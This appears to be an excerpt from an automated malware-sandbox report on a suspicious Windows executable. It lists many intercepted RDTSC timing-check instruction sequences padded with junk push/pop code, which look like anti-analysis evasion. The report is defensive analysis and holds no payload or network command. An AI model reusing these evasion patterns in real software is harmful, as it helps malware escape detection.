Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11DFA69 second address: 11DFA6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11E7456 second address: 11E745C instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11E745C second address: 11E7462 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11E7125 second address: 11E712E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11E712E second address: 11E7139 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11F5CF3 second address: 11F5CFB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11F5CFB second address: 11F5D0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F2468CF6A3Ch 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11F5E24 second address: 11F5E31 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jbe 00007F2468994E9Eh 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11F5E31 second address: 11F5E3E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 pushad 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11F5E3E second address: 11F5E48 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11F5E48 second address: 11F5E64 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F2468CF6A3Fh 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11F5E64 second address: 11F5E68 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1208F6A second address: 1208F7F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A41h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1208F7F second address: 1208F9D instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jmp 00007F2468994EA0h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jl 00007F2468994E96h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1208F9D second address: 1208FC4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push esi 0x0000000c jmp 00007F2468CF6A40h 0x00000011 pop esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 jno 00007F2468CF6A36h 0x0000001c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1208FC4 second address: 1208FC8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1208FC8 second address: 1208FCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12142CF second address: 12142D3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12142D3 second address: 12142E7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F2468CF6A3Bh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12142E7 second address: 12142EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12142EF second address: 12142F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12142F6 second address: 12142FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12142FE second address: 121430C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jng 00007F2468CF6A36h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 121430C second address: 1214310 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1214310 second address: 1214323 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b jne 00007F2468CF6A36h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1214323 second address: 1214328 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1214644 second address: 1214648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12177FD second address: 121781E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F2468994E96h 0x00000009 push edi 0x0000000a pop edi 0x0000000b jmp 00007F2468994EA4h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12289EA second address: 12289EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12289EE second address: 12289F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12289F4 second address: 1228A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jns 00007F2468CF6A3Eh 0x0000000f jmp 00007F2468CF6A46h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1228A21 second address: 1228A2D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 js 00007F2468994E96h 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1228A2D second address: 1228A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jnp 00007F2468CF6A36h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12362C7 second address: 12362F1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994E9Ch 0x00000007 jmp 00007F2468994EA6h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12362F1 second address: 12362F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12362F7 second address: 12362FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12362FD second address: 1236316 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007F2468CF6A44h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1236316 second address: 123632B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 pushad 0x00000009 pushad 0x0000000a popad 0x0000000b jnp 00007F2468994E96h 0x00000011 pushad 0x00000012 popad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 123632B second address: 1236347 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F2468CF6A44h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1235FC9 second address: 1235FCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1235FCD second address: 1235FD5 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1238B93 second address: 1238B9C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1238B9C second address: 1238BBB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A44h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1238BBB second address: 1238BC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 123B134 second address: 123B152 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jl 00007F2468CF6A36h 0x0000000f jmp 00007F2468CF6A3Fh 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 123B152 second address: 123B156 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 124DD11 second address: 124DD15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 124E033 second address: 124E037 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 124E190 second address: 124E194 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 124E2F0 second address: 124E2F7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 124E46B second address: 124E46F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 124E46F second address: 124E47D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jg 00007F2468994E98h 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 124E47D second address: 124E499 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A42h 0x00000009 jne 00007F2468CF6A36h 0x0000000f rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12511A0 second address: 12511B8 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jnl 00007F2468994E96h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push ebx 0x00000010 pop ebx 0x00000011 pushad 0x00000012 popad 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 push ebx 0x00000017 pop ebx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12511B8 second address: 12511BC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12513C5 second address: 12513C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12513C9 second address: 12513EA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A45h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a push eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12513EA second address: 12513EE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12513EE second address: 12513F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 12513F4 second address: 1251402 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468994E9Ah 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 125455C second address: 1254560 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1254560 second address: 1254566 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1256073 second address: 1256079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1256079 second address: 125607E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 125607E second address: 1256084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1256084 second address: 1256088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11674DE second address: 11674E4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 11674E4 second address: 1167509 instructions: 0x00000000 rdtsc 0x00000002 jl 00007F2468994EAAh 0x00000008 jmp 00007F2468994EA4h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 1167509 second address: 116750D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 116750D second address: 1167517 instructions: 0x00000000 rdtsc 0x00000002 js 00007F2468994E96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548065F second address: 5480675 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 mov bx, B2CCh 0x0000000d popad 0x0000000e mov dword ptr [esp], ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480675 second address: 548067D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movzx ecx, bx 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548067D second address: 548068C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468CF6A3Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548068C second address: 5480690 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480690 second address: 54806AA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b mov eax, edi 0x0000000d mov ebx, 737AF5E2h 0x00000012 popad 0x00000013 push eax 0x00000014 push eax 0x00000015 push edx 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54806AA second address: 54806C5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548080E second address: 548083F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A41h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jmp 00007F2468CF6A46h 0x00000013 popad 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548083F second address: 5480851 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F2468994E9Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480885 second address: 54808C0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A49h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, esi 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F2468CF6A48h 0x00000014 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54808C0 second address: 54808C6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54808C6 second address: 54808F2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop esi 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2468CF6A47h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54808F2 second address: 548091F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468994EA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F2468994E9Dh 0x00000011 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 548091F second address: 5480925 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5480925 second address: 547008F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 retn 0004h 0x0000000b nop 0x0000000c sub esp, 04h 0x0000000f xor ebx, ebx 0x00000011 cmp eax, 00000000h 0x00000014 je 00007F2468994FEBh 0x0000001a mov dword ptr [esp], 0000000Dh 0x00000021 call 00007F246CE6A1D5h 0x00000026 mov edi, edi 0x00000028 jmp 00007F2468994EA0h 0x0000002d xchg eax, ebp 0x0000002e jmp 00007F2468994EA0h 0x00000033 push eax 0x00000034 pushad 0x00000035 mov cl, bl 0x00000037 mov ebx, esi 0x00000039 popad 0x0000003a xchg eax, ebp 0x0000003b jmp 00007F2468994EA4h 0x00000040 mov ebp, esp 0x00000042 jmp 00007F2468994EA0h 0x00000047 sub esp, 2Ch 0x0000004a jmp 00007F2468994EA0h 0x0000004f xchg eax, ebx 0x00000050 pushad 0x00000051 movsx edx, cx 0x00000054 popad 0x00000055 push eax 0x00000056 jmp 00007F2468994E9Fh 0x0000005b xchg eax, ebx 0x0000005c push eax 0x0000005d push edx 0x0000005e push eax 0x0000005f push edx 0x00000060 jmp 00007F2468994EA0h 0x00000065 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 547008F second address: 547009E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F2468CF6A3Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 547009E second address: 54700F5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F2468994E9Fh 0x00000008 pop esi 0x00000009 jmp 00007F2468994EA9h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 xchg eax, edi 0x00000012 pushad 0x00000013 mov al, 09h 0x00000015 call 00007F2468994EA9h 0x0000001a mov bx, si 0x0000001d pop esi 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54700F5 second address: 54700FD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 movsx ebx, ax 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54700FD second address: 5470103 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 5470103 second address: 5470107 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 547028A second address: 54702E0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F2468994EA1h 0x00000008 pushfd 0x00000009 jmp 00007F2468994EA0h 0x0000000e sub si, 1698h 0x00000013 jmp 00007F2468994E9Bh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c nop 0x0000001d jmp 00007F2468994EA6h 0x00000022 push eax 0x00000023 pushad 0x00000024 push eax 0x00000025 push edx 0x00000026 mov cl, dh 0x00000028 rdtsc
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	RDTSC instruction interceptor: First address: 54702E0 second address: 54702EE instructions: 0x00000000 rdtsc 0x00000002 mov esi, 3DC9562Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b movzx eax, di 0x0000000e rdtsc
